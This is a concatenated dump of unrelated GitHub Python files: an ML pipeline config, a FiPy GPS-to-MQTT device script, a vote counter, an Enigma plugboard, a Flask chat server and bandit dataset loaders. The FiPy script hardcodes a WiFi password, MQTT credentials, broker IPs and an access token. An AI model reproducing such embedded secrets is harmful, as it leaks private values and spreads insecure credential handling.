dataset = \"Nations\", # \"FB15K\", \"WN\", \"WN18RR\", \"FB237\", \"YAGO3-10\"\n model = \"TransE\", # TransE, RotE; ComplEx, RotatE\n regularizer = \"N3\",\n reg = 0, \n optimizer = \"Adam\", \n max_epochs = 50, \n patience = 10, \n valid = 2,\n rank = 2, \n batch_size = 1000, \n neg_sample_size = 50, \n dropout = 0, \n init_size = 1e-3, \n learning_rate = 0.005, \n gamma = 1,\n bias = \"constant\",\n dtype = \"double\",\n double_neg = True, \n debug = False, \n multi_c = False,\n device = \"cuda:2\",\n random_seed = 0\n )\n\n # deletion_mode, n_del, degree_set, repeat\n # run_influence(args, \"random\", 1, repeat=2, save_model=True)\n # run_influence(args, \"degree\", 1, degree_set={\"entity\": [\"low\", 1], \"relation\": [\"low\", 1]}, repeat=2, save_model=True)\n model = model_test(args)\n\n# %%\n","repo_name":"ZhuYuqicheng/KGEraser","sub_path":"9_pipeline.py","file_name":"9_pipeline.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11567174257","text":"from microWebSrv import MicroWebSrv\nimport parserGen\nimport pycom\nimport time\nfrom machine import UART\nimport network\nfrom mqtt import MQTTClient\nimport json\t\n\ndef _httpHandlerNEOGet1s(httpClient, httpResponse):\n try:\n latlon, velocity, gpsQ, height, GMT, PDOP, HDOP, VDOP, uniqsatNum = parsedReadings.__next__() \n except:\n latlon = velocity = gpsQ = height = GMT = PDOP = HDOP = VDOP = uniqsatNum = 'Error occurred, please restart FiPy...'\n second = 1000 \n httpResponse.WriteResponseOk(\n headers = ({'Cache-Control': 'no-cache'}),\n contentType = 'text/event-stream',\n contentCharset = 'UTF-8',\n content = 'retry: {0}\\n'.format(second)+\n 'data: {0}
\\n'.format('Latitude and Longitude:') +\n 'data: {0}

\\n'.format(latlon)+\n 'data: {0}
\\n'.format('Velocity:')+\n 'data: {0}

\\n'.format(velocity)+\n 'data: {0}
\\n'.format('Orthometric height:')+\n 'data: {0}

\\n'.format(height)+\n 'data: {0}
\\n'.format('Time in GMT:')+\n 'data: {0}

\\n'.format(GMT)+\n 'data: {0}
\\n'.format('GPS Quality indicator:')+\n 'data: {0}

\\n'.format(gpsQ)+\n 'data: PDOP:{0} HDOP:{1} VDOP:{2}

\\n'.format(PDOP, HDOP, VDOP)+\n 'data: {0}
\\n'.format('Number of active satellites:')+\n 'data: {0}

\\n\\n'.format(uniqsatNum)\n )\n\ndef _httpHandlerTestGet(httpClient, httpResponse) :\n\tcontent = \"\"\"\\\n\t\n\t\n \n \t\n MODE SWITCH\n \n \n

===MODE SWITCH===

\n Your IP address = %s\n
\n\t\t\t
\n\t\t\t\tChoice: type 'mqtt' to switch to MQTT mode...
\n\t\t\t\t\n\t\t\t
\n \n \n\t\"\"\" % httpClient.GetIPAddr()\n\thttpResponse.WriteResponseOk( headers\t\t = None,\n\t\t\t\t\t\t\t\t contentType\t = \"text/html\",\n\t\t\t\t\t\t\t\t contentCharset = \"UTF-8\",\n\t\t\t\t\t\t\t\t content \t\t = content )\n\ndef _httpHandlerTestPost(httpClient, httpResponse) :\n formData = httpClient.ReadRequestPostedFormData()\n status = formData[\"status\"]\n content = \"\"\"\\\n \n \n\t\t\n\t\t\t\n MODE SWITCH\n \n \n

===MODE SWITCH===

\n Choice = %s
\n \n \n\t\"\"\" % ( MicroWebSrv.HTMLEscape(status))\n httpResponse.WriteResponseOk( headers\t\t = None,\n\t\t\t\t\t\t\t\t contentType\t = \"text/html\",\n\t\t\t\t\t\t\t\t contentCharset = \"UTF-8\",\n\t\t\t\t\t\t\t\t content \t\t = content )\n\n if status == \"mqtt\":\n print(\">>MQTT mode selected<<\")\n mf = open(\"status.txt\", \"w\")\n mf.write(\"yes\")\n mf.close()\n\ndef switchToParallelMQTT():\n # BEGIN SETTINGS\n AIO_CLIENT_ID = \"Charles\"\n AIO_SERVER = \"203.101.227.137\"\n AIO_PORT = 1883\n AIO_USER = \"qut\"\n AIO_KEY = \"qut\"\n AIO_CONTROL_FEED = \"fipy/test\"\n AIO_RANDOMS_FEED = \"fipy/randoms\"\n\n # Setup thingsboard connection\n THINGSBOARD_HOST = '203.101.225.130'\n QUT01_ACCESS_TOKEN = 'test12345'\n\n # FUNCTIONS\n # Function to respond to messages from Adafruit IO\n def sub_cb(topic, msg): # sub_cb means \"callback subroutine\"\n print((topic, msg)) # Outputs the message that was received. Debugging use.\n\n if msg == b\"ON\": # If message says \"ON\" ...\n pycom.rgbled(0xffffff) # ... then LED on\n\n elif msg == b\"OFF\": # If message says \"OFF\" ...\n pycom.rgbled(0x000000) # ... then LED off\n\n else: # If any other message is received ...\n print(\"Unknown message\") # ... do nothing but output that it happened. \n\n def send_readings():\n try:\n latlon, velocity, gpsQ, height, GMT, PDOP, HDOP, VDOP, uniqsatNum = parsedReadings.__next__() \n except:\n latlon = velocity = gpsQ = height = GMT = PDOP = HDOP = VDOP = uniqsatNum = 'Error occurred, please restart FiPy...'\n\n gnssReadings = \"Laitude and Longitude: {0}, Velocity: {1}, Orthometric height: {2}, Time in GMT: {3}, GPS Quality indicator: {4}, Number of active satellites: {5}, PDOP:{6} HDOP:{7} VDOP:{8}\"\\\n .format(latlon, velocity, gpsQ, height, GMT, uniqsatNum, PDOP, HDOP, VDOP) \n\n if 'Error' in latlon:\n location = {'lat': latlon, 'lon': latlon}\n\n elif 'N/A' in latlon:\n location = {'lat': latlon, 'lon': latlon}\n\n else:\n temp1 = latlon.split(\";\")\n Lat = float(temp1[0].replace(\"S\",\"-\").replace(\"N\",\"\"))\n Lon = float(temp1[1].replace(\"E\",\"\").replace(\"W\",\"-\"))\n location = {'lat': float(Lat), 'lon': float(Lon)}\n \n try:\n print(\"Publishing: {0} to {1} ... \".format(gnssReadings, AIO_RANDOMS_FEED), end='')\n client.publish(topic=AIO_RANDOMS_FEED, msg=str(gnssReadings))\n print(\"DONE\")\n time.sleep(0.5)\n client2.publish(topic='v1/devices/me/attributes', msg=json.dumps(location))\n print(\"coordinate sent: {0}\".format(latlon))\n\n except Exception:\n print(\"FAILED\")\n\n finally:\n print(\"------------------------------------------------------------------------------\")\n\n client2 = MQTTClient(client_id=\"test\", server=THINGSBOARD_HOST, port=1883, user=QUT01_ACCESS_TOKEN, password=QUT01_ACCESS_TOKEN, keepalive=60)\n\n #Connect to Thingsboard using default MQTT port and 60 seconds keepalive intervals\n client2.connect()\n\n print(\">>>connected to things platform<<<\")\n pycom.rgbled(0x00ff00) #green\n # Use the MQTT protocol to connect to Adafruit IO\n client = MQTTClient(AIO_CLIENT_ID, AIO_SERVER, AIO_PORT, AIO_USER, AIO_KEY)\n\n # Subscribed messages will be delivered to this callback\n client.set_callback(sub_cb)\n client.connect()\n client.subscribe(AIO_CONTROL_FEED)\n print(\"Connected to %s, subscribed to %s topic\" % (AIO_SERVER, AIO_CONTROL_FEED))\n pycom.rgbled(0x00ff00) # Status green: online to Adafruit IO \n\n try:\n while True: # Repeat this loop forever\n client.check_msg()# Action a message if one is received. Non-blocking.\n send_readings() # Send current GNSS readings\n time.sleep(3) # publish every 3 seconds\n\n except KeyboardInterrupt: \t\t# catches the ctrl-c command, which breaks the loop above\n print(\"Continuous polling stopped\")\n\n finally: # If an exception is thrown ...\n client.disconnect() # ... disconnect the client and clean up.\n client2.disconnect()\n client2 = None\n client = None\n global wlan # add globale so that wlan can be modified\n wlan.disconnect()\n wlan = None\n pycom.rgbled(0x000022) # Status blue: stopped\n print(\"MQTT stopped\")\n\nprint(\">>starting web server<<\")\npycom.rgbled(0xff0000) #red\ntime.sleep(1)\n\nuart = UART(1, baudrate = 115200, pins = ('P3','P4')) # create uart object\nuart.init(115200, bits = 8, parity = None, stop = 1) # init reading\nparsedReadings = parserGen.output(uart) # generator object yields parsed readings\n\n# configure server\nrouteHandlers = [ ( '/read', 'GET', _httpHandlerNEOGet1s ),\n ( \"/test\",\t\"GET\",\t_httpHandlerTestGet ),\n ( \"/test\",\t\"POST\",\t_httpHandlerTestPost )]\nsrv = MicroWebSrv(routeHandlers=routeHandlers, webPath = '/flash/www/')\ntime.sleep(0.25)\nsrv.Start(threaded = True) # start server\npycom.rgbled(0x00ff00) #green\nprint(\">>local webServer started<<\")\ntime.sleep(0.25)\nmf = open(\"status.txt\", \"w\") # use to determine mqtt switch\nmf.close()\nwhile True:\n time.sleep(1)\n condf = open(\"status.txt\", \"r\")\n cond = condf.read()\n condf.close()\n if cond == \"yes\": # use to determine mqtt switch\n print(\">>stopping server<<\")\n pycom.rgbled(0xff0000) #red\n time.sleep(1)\n srv.Stop() #stop server\n print(\">>local server stopped<<\")\n time.sleep(1)\n break\n else:\n pass\nprint(\">>changing WIFI mode<<\")\n# setup as a station\nwlan = network.WLAN(mode=network.WLAN.STA)\nprint(\">>attempting hotspot connection, FiPy is in station mode<<\")\nwlan.connect('TPU4G_L3TN', auth=(network.WLAN.WPA2, '56156271'))\ntime.sleep(5)\nwhile not wlan.isconnected(): #retry every 5 seconds\n wlan.connect('TPU4G_L3TN', auth=(network.WLAN.WPA2, '56156271'))\n time.sleep(5)\nprint(\">>waiting for IP and DNS configuration<<\")\npycom.rgbled(0xff00f4) #ligt purple, wifi connected\nwhile True: # ensure that hotspot's ip config is correctly set up\n ipCond = wlan.ifconfig()[1]\n if ipCond == '0.0.0.0':\n time.sleep(0.5)\n pass\n else:\n break\nprint(wlan.ifconfig())\nprint(\">>connected to hotspot<<\")\ntime.sleep(1)\nswitchToParallelMQTT()","repo_name":"wowkucko/proba","sub_path":"allInOne.py","file_name":"allInOne.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71062696264","text":"import os\nimport csv\n\n# identify file path\nelection = os.path.join(\"Resources\", \"Election_data.csv\")\n\ncount = {}\ntotal = 0\npercent = {}\nwinner = 0\n\n\nwith open(election) as csv_file:\n elect_reader = csv.reader(csv_file, delimiter=\",\")\n\n header = next(elect_reader)\n\n for row in elect_reader:\n total += 1\n if row[2] in count:\n count[row[2]] += 1\n\n else:\n count[row[2]] = 1\n\nfor candidate in count:\n percent[candidate] = (count[candidate] / total) * 100\n\n if count[candidate] > winner:\n winner= count[candidate]\n won = candidate\n\noutput_path = os.path.join('Analysis', 'Election_Analysis.txt')\n\nwith open(output_path, 'w', newline=\"\") as txtfile:\n\n txtfile.write(f'''\n Election Results\n -------------------------\n Total Votes: {total}\n -------------------------\\n''')\n\n print(f'''\\nElection Results\n -------------------------\n Total Votes: {total}\n -------------------------''')\n\n for candidate, votes in count.items():\n txtfile.write(f'{candidate}: {percent[candidate]:.3f}% ({votes})\\n')\n \n print(f'''{candidate}: {percent[candidate]:.3f}% ({votes})''')\n \n txtfile.write(f'''-------------------------\n Winner: {won}\n -------------------------''')\n\n print(f'''-------------------------\n Winner: {won}\n -------------------------''')\n\n\n","repo_name":"LFurman7/Python-Challenge-2-","sub_path":"PyPoll/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3994940097","text":"from string import ascii_letters as AL\nimport re\n\nclass Plugboard(object):\n def __init__(self, wires=''):\n if len(wires)%2!=0 or len(wires)>20 or len(set(wires))!=len(wires):\n raise ValueError('Error!')\n \n self.pairs = {i:i for i in AL}\n \n for i,j in re.findall('.{2}', wires):\n self.pairs[i]=j\n self.pairs[j]=i\n \n def process(self, c):\n try: return self.pairs[c]\n except KeyError: return c\n","repo_name":"Orange9000/Codewars","sub_path":"Solutions/6kyu/6kyu_the_enigma_machine_part1.py","file_name":"6kyu_the_enigma_machine_part1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"16626120148","text":"import math\n\n\n# Цвета (R, G, B)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nDARK_BUTTON = (150, 150, 150)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREY = (220, 220, 220)\nBROWN = (221, 153, 102)\n\n# Настройка окна\nscreen_name = 'ahahaha'\nWIDTH = 1500\nHEIGHT = 1000\nFPS = 120\nWALL_SIZE = 100\n\n# Для мобов\n# Значения для спавна мобов\nmobs_values_x = []\nmobs_values_y = []\nmobs_values_player_spawn_x = []\nmobs_values_player_spawn_y = []\nfor i in range(50, WIDTH - 50):\n mobs_values_x.append(i)\nfor i in range(50, HEIGHT - 200):\n mobs_values_y.append(i)\n","repo_name":"Happyigr/dragon_slayer","sub_path":"stuff/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71298325051","text":"\"\"\"server.py\nРеализация сервера для мессенеджера\n\"\"\"\nimport time as t\nfrom datetime import datetime\nfrom flask import Flask, request, jsonify, abort\nfrom pokebot import PokeBot\n\napp = Flask(__name__)\n\ndb = []\nusers = set()\nbot = PokeBot()\ndb.append(bot.check_message(\"/help\", \"все\"))\n\n\n@app.route(\"/\")\ndef hello():\n \"\"\"handler for root\n \"\"\"\n return \"Hello, World!\"\n\n\n@app.route(\"/status\")\ndef status():\n \"\"\"handler for status\n return status, name of service, current server time, number of messages and users\n \"\"\"\n return jsonify(\n {\n \"status\": True,\n \"name\": \"Telegraph app\",\n \"time\": datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\n \"messages_count\": len(db),\n \"users_count\": len(users)\n }\n )\n\n\n@app.route(\"/send\", methods=[\"POST\"])\ndef send_message():\n \"\"\"handler for send\n POST body format:\n {\n \"name\" : string,\n \"text\" : string\n }\n validation error - 400,\n return message:\n {\n \"ok\" : True\n }\n Status code for ok: 200\n \"\"\"\n data = request.json\n\n if not isinstance(data, dict):\n return abort(400)\n if set(data.keys()) != {\"name\", \"text\"}:\n return abort(400)\n\n name = data[\"name\"]\n text = data[\"text\"]\n\n if not isinstance(name, str) or \\\n not isinstance(text, str) or \\\n name == \"\" or \\\n text == \"\":\n return abort(400)\n\n users.add(name)\n message = {\n 'time': t.time(),\n 'name': name,\n 'text': text,\n }\n db.append(message)\n\n bot_message = bot.check_message(text, name)\n if bot_message:\n db.append(bot_message)\n\n return jsonify(\n {\n \"ok\": True\n }\n )\n\n\n@app.route(\"/messages\", methods=[\"GET\"])\ndef get_messages():\n \"\"\"handler for messages\n GET needs parameter after : float\n validation error - 400,\n return message:\n [\n {\n \"time\" : timestamp,\n \"name\" : string,\n \"text\" : string\n },\n ...\n ]\n Status code for ok: 200\n \"\"\"\n try:\n after = float(request.args[\"after\"])\n except KeyError:\n return abort(400)\n except ValueError:\n return abort(400)\n\n result = []\n for message in db:\n if message['time'] > after:\n result.append(message)\n if len(result) >= 1:\n break\n\n return jsonify(result)\n\n\napp.run()\n","repo_name":"KapitanD/python-messenager","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18154720517","text":"import os\r\ndialogo = []\r\ndef leer():\r\n list = open(\"dialogo.txt\").readlines()\r\n for i in range(len(list)): \r\n dialogo.append(list[i].replace('\\n', '').replace(',','').replace('.',''))\r\n\r\n if os.path.isfile(\"resultado.txt\") == False: open(\"resultado.txt\", \"w+\").close()\r\n\r\ndef write(word):\r\n info = [[0 for i in range(2)] for j in range(8)]\r\n for i in range(len(dialogo)):\r\n linea = dialogo[i].split()\r\n c = 0\r\n for x in range(len(linea)): \r\n if linea[x].lower() == word: c+=1\r\n if c > 0: info[i] = [i+1,c]\r\n else: info[i] = [i+1,0]\r\n\r\n print(f'Palabra a buscar: {word}')\r\n for i in range(len(info)): print(f\"Linea {i+1} - {info[i][1]}\")\r\n\r\n with open(\"resultado.txt\", 'a') as f: \r\n f.write(f'Palabra a buscar: {word}\\n')\r\n for i in range(len(dialogo)): f.write(f\"Linea {i+1} - {info[i][1]}\\n\")\r\n \r\n input('*presione enter para continuar')\r\n main()\r\n\r\ndef main():\r\n leer()\r\n while True:\r\n os.system('clear' if os.name == 'posix' else 'cls')\r\n word = input('Ingrese una palabra: ')\r\n write(word)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"joncortes22/ClasesBasica","sub_path":"ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31033657859","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pairing as pf\n\nfrom skmultilearn.cluster import MatrixLabelSpaceClusterer\nfrom sklearn.cluster import KMeans\nfrom skmultilearn.dataset import load_dataset\nfrom category_encoders.hashing import HashingEncoder\nfrom sklearn.feature_selection import VarianceThreshold\n\n###____________ CriteoDatasets ____________###\nclass CriteoDatasets():\n def __init__(self):\n self.datasets_list = ['criteo_kaggle']\n\n def create_tabular_dataset(self, train, prc = 10, verbose=False):\n \n def pairit(data):\n p1 = pf.pair(data[\"col_0\"],data[\"col_1\"])\n p2 = pf.pair(p1,data[\"col_2\"])\n return pf.pair(p1,p2)\n\n def code_by_freq(data):\n code = np.where(top_val_count[:,1] == data['col'])[0][0]\n return code\n \n ce_hash = HashingEncoder(cols = list(train.columns[12:]), n_components=3, verbose=1, drop_invariant=True, hash_method='md5')\n tmp_data = ce_hash.fit_transform(train[train.columns[2:]])\n tmp_data[\"Label\"] = train[\"Label\"] \n train = tmp_data\n\n train[\"col\"] = train.apply(pairit, axis=1)\n\n bc = np.bincount(train[\"col\"].values.astype(int))\n nz = np.nonzero(bc)[0]\n val_count = np.sort(np.array([list(a) for a in zip(nz,bc[nz])]))\n val_count = val_count[val_count[:,0].argsort()]\n vc_mean = val_count[:,0].mean()\n top_val_count = (val_count[val_count[:,0] > vc_mean][::-1])\n\n train = train.drop(columns=[\"col_0\", \"col_1\", \"col_2\"])\n train = train[train[\"col\"].isin(top_val_count[:,1][:prc])]\n\n\n train[\"prc\"] = train.apply(code_by_freq, axis=1)\n train = train.drop(columns=[\"col\"])\n if verbose:\n print(train[\"prc\"].value_counts())\n\n tmp = list(train.columns[:-2])\n tmp.extend([\"prc\",\"Label\"])\n train = train.reindex(columns=tmp)\n train = train.rename(index=str, columns={\"I2\":\"f1\",\n \"I3\":\"f2\",\n \"I4\":\"f3\",\n \"I5\":\"f4\",\n \"I6\":\"f5\",\n \"I7\":\"f6\",\n \"I8\":\"f7\",\n \"I9\":\"f8\",\n \"I11\":\"f9\",\n \"I13\":\"f10\"})\n\n if verbose:\n print(train.head())\n\n train = train.drop(columns=[\"Label\"])\n train = train.reset_index(drop=True)\n train.head()\n\n X = train[train.columns[:-1]]\n y = train[train.columns[-1]]\n\n return X, y\n\n \n def partition_features(self, K, X, y):\n \n #selector = SelectKBest(mutual_info_classif, k='all')\n #selector.fit(X, y)\n #selected_features = list(selector.scores_)\n #most_feat = set((np.argpartition(selected_features, -K)[-K:]))\n #least_feat = set(range(X.shape[1])).difference(most_feat)\n #most_feat = np.array(sorted(list(most_feat)))\n #least_feat = np.array(sorted(list(least_feat)))\n vt = VarianceThreshold()\n vt.fit(X)\n idx = np.argpartition(vt.variances_, K)\n most_feat = idx[K:]\n least_feat = idx[:K]\n return most_feat, least_feat\n\n def splitted_criteo(self, X, y, N, Kp, shuffle = False, verbose = True, focus=\"pref\"):\n K = X.shape[1]\n if verbose:\n print(\"K = \", Kp)\n most_feat, least_feat = self.partition_features(Kp, X, y)\n if verbose:\n print(\"\\nMost Relevant \",Kp, \" Features:\", most_feat)\n print(\"\\nLeast Relevant \", K-Kp ,\" Features:\", least_feat)\n print(\"Focus on: \", focus)\n if focus == \"pref\":\n pref = X[:,most_feat]\n context = X[:,least_feat]\n\n elif focus == \"context\":\n context = X[:,most_feat] \n pref = X[:,least_feat]\n \n if shuffle:\n c = list(zip(context, pref, X, y))\n np.random.shuffle(c)\n context, pref, y = zip(*c)\n context = np.array(context).squeeze(axis=1)\n pref = np.array(pref).squeeze(axis=1)\n y = np.array(y).squeeze(axis=1)\n else:\n context = np.array(context)\n pref = np.array(pref)\n y = np.array(y)\n if verbose:\n print(\"\\n Contexts Shape: \", context.shape)\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Responses Shape: \", y.shape)\n\n \n if verbose:\n plt.rcParams[\"figure.figsize\"] = 16,4\n plt.bar(range(context.shape[1]), np.asarray(context.sum(axis=0)/context.sum()), label = \"Contexts\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(pref.shape[1]), np.asarray(pref.sum(axis=0)/pref.sum()), label = \"Preferences\")\n plt.legend(prop={'size': 20})\n plt.show()\n\n\n sp_context = np.array_split(context, N)\n sp_pref = np.array_split(pref, N)\n sp_response = np.array_split(y, N)\n\n return sp_context, sp_pref, sp_response\n\n\n###____________ MultiLabelDatasets ____________###\nclass MultiLabelDatasets():\n def __init__(self):\n self.datasets_list = ['mediamill']\n\n def partition_features(self, K, X, y):\n from sklearn.feature_selection import chi2, SelectKBest\n selected_features = [] \n for label in range(y.shape[1]):\n selector = SelectKBest(chi2, k='all')\n selector.fit(X, y[:,label])\n selected_features.append(list(selector.scores_))\n avg_selected_features = np.mean(selected_features, axis=0) \n most_feat = set((np.argpartition(avg_selected_features, -K)[-K:]))\n least_feat = set(range(X.shape[1])).difference(most_feat)\n most_feat = np.array(sorted(list(most_feat)))\n least_feat = np.array(sorted(list(least_feat)))\n return most_feat, least_feat\n\n def splitted_mediamill(self, N, red_K, shuffle = False, verbose=True, focus=\"pref\"):\n X_tr, y_tr, feature_names, label_names = load_dataset('mediamill', 'train')\n X_te, y_te, _, _ = load_dataset('mediamill', 'test')\n\n X_tr = X_tr.todense()\n X_te = X_te.todense()\n y_tr = y_tr.todense()\n y_te = y_te.todense()\n if verbose:\n print(\"Shape of Train Data: \", X_tr.shape)\n print(\"Shape of Test Data: \", X_te.shape)\n print(\"Shape of Train Labels: \", y_tr.shape)\n print(\"Shape of Test Data: \", y_te.shape)\n \n X = np.concatenate((X_tr, X_te), axis=0)\n y = np.concatenate((y_tr, y_te), axis=0)\n y = y[:,np.asarray(y.sum(axis=0) > 100)[0]]\n if verbose:\n print(\"Shape of All Data:\", X.shape)\n print(\"Shape of All Labels:\", y.shape)\n \n K= y.shape[1]\n most_feat, least_feat = self.partition_features(K, X, y)\n if verbose:\n print(\"\\nMost Relevant \",K, \" Features:\", most_feat)\n print(\"\\nLeast Relevant \", X.shape[1]-K ,\" Features:\", least_feat)\n\n if focus == \"pref\":\n pref = (X[:,most_feat] > 0.45).astype(float)\n context = (X[:,least_feat] > 0.45).astype(float)\n if verbose:\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Contexts Shape: \", context.shape)\n \n pref = pref[:,np.asarray(pref.sum(axis=0) > 2400)[0]]\n y = y[:,np.asarray(y.sum(axis=0) > 450)[0]]\n context = context[:,np.asarray(np.logical_and(context.sum(axis=0) > 2000 , context.sum(axis=0) < 40000))[0]]\n\n \n elif focus == \"context\":\n context = (X[:,most_feat] > 0.45).astype(float)\n pref = (X[:,least_feat] > 0.45).astype(float)\n if verbose:\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Contexts Shape: \", context.shape)\n \n pref = pref[:,np.asarray(pref.sum(axis=0) > 500)[0]]\n y = y[:,np.asarray(y.sum(axis=0) > 450)[0]]\n context = context[:,np.asarray(np.logical_and(context.sum(axis=0) > 9999 , context.sum(axis=0) < 29000))[0]]\n \n if shuffle:\n c = list(zip(context, pref, y))\n np.random.shuffle(c)\n context, pref, y = zip(*c)\n context = np.array(context).squeeze(axis=1)\n pref = np.array(pref).squeeze(axis=1)\n y = np.array(y).squeeze(axis=1)\n else:\n context = np.array(context)\n pref = np.array(pref)\n y = np.array(y)\n if verbose:\n print(\"\\n Contexts Shape: \", context.shape)\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Actions Shape: \", y.shape)\n \n \n matrix_clusterer = MatrixLabelSpaceClusterer(clusterer=KMeans(n_clusters=red_K))\n similar_ys = matrix_clusterer.fit_predict(context, y)\n if verbose:\n print(\"Silimar Labeles: \", similar_ys)\n \n y_red = np.zeros((y.shape[0],red_K))\n for k, lbs in enumerate(similar_ys):\n for lb in lbs:\n y_red[:,k] += y[:,lb]\n y_red = (y_red >=1).astype(float)\n \n if verbose:\n plt.rcParams[\"figure.figsize\"] = 16,4\n plt.bar(range(context.shape[1]), np.asarray(context.sum(axis=0)), label = \"Contexts\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(pref.shape[1]), np.asarray(pref.sum(axis=0)), label = \"Preferences\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(y_red.shape[1]), np.asarray(y_red.sum(axis=0)), label = \"Responses\")\n plt.legend(prop={'size': 20})\n plt.show()\n\n sp_context = np.array_split(context, N)\n sp_pref = np.array_split(pref, N)\n sp_response = np.array_split(y_red, N)\n \n return sp_context, sp_pref, sp_response\n \n\n def splitted_tmc(self, N, Km, Ksm, shuffle = False, verbose=True, focus=\"pref\"):\n X_tr, y_tr, feature_names, label_names = load_dataset('tmc2007_500', 'train')\n X_te, y_te, _, _ = load_dataset('tmc2007_500', 'test')\n\n X_tr = X_tr.todense()\n X_te = X_te.todense()\n y_tr = y_tr.todense()\n y_te = y_te.todense()\n if verbose:\n print(\"Shape of Train Data: \", X_tr.shape)\n print(\"Shape of Test Data: \", X_te.shape)\n print(\"Shape of Train Labels: \", y_tr.shape)\n print(\"Shape of Test Data: \", y_te.shape)\n\n X = np.concatenate((X_tr, X_te), axis=0)\n y = np.concatenate((y_tr, y_te), axis=0)\n\n most_feat, least_feat = self.partition_features(Km, X, y)\n if verbose:\n print(\"\\nMost Relevant \",Km, \" Features:\", most_feat)\n #print(\"\\nLeast Relevant \", X.shape[1]-Km ,\" Features:\", least_feat)\n\n red_X = X.copy()\n red_X[:, most_feat] = 1\n\n red_most_feat, red_least_feat = self.partition_features(Ksm, red_X, y)\n if verbose:\n print(\"\\nSecond Most Relevant \",Ksm, \" Features:\", red_most_feat)\n #print(\"\\nLeast Relevant \", X.shape[1]-Ksm ,\" Features:\", red_least_feat)\n\n if focus == \"pref\":\n pref = X[:,most_feat]\n context = X[:,red_most_feat]\n elif focus == \"context\":\n context = X[:,most_feat] \n pref = X[:,red_most_feat]\n \n if verbose:\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Contexts Shape: \", context.shape)\n\n\n if shuffle:\n c = list(zip(context, pref, y))\n np.random.shuffle(c)\n context, pref, y = zip(*c)\n context = np.array(context).squeeze(axis=1)\n pref = np.array(pref).squeeze(axis=1)\n y = np.array(y).squeeze(axis=1)\n else:\n context = np.array(context)\n pref = np.array(pref)\n y = np.array(y)\n if verbose:\n print(\"\\n Contexts Shape: \", context.shape)\n print(\"\\n Preferences Shape: \", pref.shape)\n print(\"\\n Actions Shape: \", y.shape)\n\n if verbose:\n plt.rcParams[\"figure.figsize\"] = 16,4\n plt.bar(range(context.shape[1]), np.asarray(context.sum(axis=0)), label = \"Contexts\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(pref.shape[1]), np.asarray(pref.sum(axis=0)), label = \"Preferences\")\n plt.legend(prop={'size': 20})\n plt.show()\n plt.bar(range(y.shape[1]), np.asarray(y.sum(axis=0)), label = \"Responses\")\n plt.legend(prop={'size': 20})\n plt.show()\n\n sp_context = np.array_split(context, N)\n sp_pref = np.array_split(pref, N)\n sp_response = np.array_split(y, N)\n\n return sp_context, sp_pref, sp_response\n\nclass Synthetic():\n def __init__(self, mapping_function):\n self.mapping_function = mapping_function\n \n def make_hists(self, n_samples, hist_size):\n hists = np.random.rand(n_samples, hist_size)\n hists_sum = np.sum(hists, axis=1 )\n for i in range(len(hists)):\n hists[i,:] = hists[i,:]/hists_sum[i]\n return hists\n\n def generate_data(self, n_users, n_samples, n_actions, context_size, \n ctr_scaling_factor=1., noise_level=.01):\n contexts = list()\n responses = list()\n for u in range(n_users):\n hists = self.make_hists(n_samples, context_size)\n resps_probs = self.mapping_function.predict(hists)\n resps_probs += noise_level * np.random.normal(0,1, (n_samples, n_actions))\n resps_probs = ctr_scaling_factor * resps_probs\n resps_probs = np.clip(resps_probs,0,1)\n resps = np.zeros((n_samples, n_actions), dtype=int)\n for s in range(n_samples):\n for a in range(n_actions):\n resps[s, a] = (np.random.rand() <= resps_probs[s, a]).astype(int)\n contexts.append(hists)\n responses.append(resps)\n \n return contexts, responses","repo_name":"mmalekzadeh/privacy-preserving-bandits","sub_path":"bandipy/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":14216,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"78"} +{"seq_id":"26536437721","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Handles generic visualization/plotting functions.\"\"\"\r\n\r\n# future imports\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\nimport itertools as it\r\nfrom typing import Optional, Union\r\n\r\n# imports\r\nimport numpy as np\r\nfrom pandas import DataFrame\r\n\r\nfrom turbopanda._metapanda import MetaPanda, SelectorType\r\nfrom turbopanda.utils import belongs, remove_na, instance_check, difference, nonnegative\r\n\r\nfrom ._gridplot import gridplot\r\nfrom ._histogram import histogram\r\nfrom ._save_fig import save\r\n\r\n__all__ = (\"scatter_grid\", \"hist_grid\")\r\n\r\n\r\ndef hist_grid(\r\n mdf: Union[DataFrame, 